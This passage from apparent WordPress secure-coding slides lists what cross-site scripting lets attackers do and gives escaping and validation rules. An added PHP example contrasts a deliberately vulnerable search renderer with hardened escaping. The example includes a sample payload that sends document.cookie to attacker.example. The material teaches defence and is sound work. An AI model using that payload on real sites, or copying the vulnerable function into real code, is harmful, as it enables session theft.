you into revealing your username/password
• Steal your cookies! This means they can simply impersonate you.
• Perform requests as the logged-in user, e.g. create themselves a new user.
• Make a request to the plugin/theme editor and write to a file that then creates a PHP back door.
(Marking the session cookie HttpOnly blocks the cookie theft, but not the requests made in your session: the script runs in your browser, so it already has your login.)
late as possible.
3. Escape everything from untrusted sources: databases and users, third parties (like Twitter), etc.
4. Never assume anything.
5. Never trust user input.
6. Sanitization is okay, but validation/rejection is better.
7. Never trust user input.
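The attack in the first list and the rules in the second, in working PHP. This is an added example, not code from the original slides or from WordPress: it uses plain-PHP stand-ins for escaping so it runs without WordPress, and only names the WordPress helpers (esc_html(), esc_attr(), esc_url(), absint()) in comments. The function names, the cookie-stealing payload and the attacker host are constructed for illustration.

```php
<?php
// Added example: context-aware escaping at output time, and validation
// (reject) versus sanitization (clean up) for untrusted input.

// --- Vulnerable: untrusted input echoed straight into HTML -----------------
function render_search_vulnerable(array $get): string {
    $term = $get['s'] ?? '';
    // Reflected XSS: a term containing <script> runs in the visitor's browser.
    return '<p>Results for: ' . $term . '</p>';
}

// --- Hardened: escape as late as possible, at the point of output ----------
// HTML body context. WordPress equivalent: esc_html().
function esc_html_ctx(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Attribute context. WordPress equivalent: esc_attr(). Same characters are
// escaped, but the attribute must ALSO be quoted in the template.
function esc_attr_ctx(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// URL context. WordPress equivalent: esc_url(). Schemes that can execute
// script are rejected outright rather than "cleaned" (rule 6).
function esc_url_ctx(string $url): string {
    $url = trim($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme !== null && !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return ''; // javascript:, data:, vbscript: ...
    }
    return esc_attr_ctx($url);
}

function render_search_hardened(array $get): string {
    $term = $get['s'] ?? '';
    return '<p>Results for: ' . esc_html_ctx($term) . '</p>'
         . '<input type="text" name="s" value="' . esc_attr_ctx($term) . '">';
}

// --- Validation beats sanitization -----------------------------------------
// A user ID must be a positive integer. intval('1 OR 1=1') silently yields 1
// (sanitizing); validating rejects anything that is not exactly an integer.
function user_id_sanitized(string $raw): int {
    return intval($raw);   // WordPress equivalent: absint()
}

function user_id_validated(string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;   // null means: reject the request
}

// Constructed sample input standing in for $_GET (attacker host is made up).
$payload = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
echo render_search_vulnerable(['s' => $payload]), "\n";   // <script> tag survives
echo render_search_hardened(['s' => $payload]), "\n";     // &lt;script&gt;... is inert text
var_dump(esc_url_ctx('javascript:alert(1)'));             // string(0) ""
var_dump(user_id_sanitized('1 OR 1=1'));                  // int(1)
var_dump(user_id_validated('1 OR 1=1'));                  // NULL
```

Escaping is done in the render function, not when the value arrives: the same string may later be put into an attribute, a URL or a JSON blob, and each context needs its own escaper. Note that the URL and integer helpers reject rather than repair; a request that fails validation should get an error response, not a best-effort guess at what the user meant.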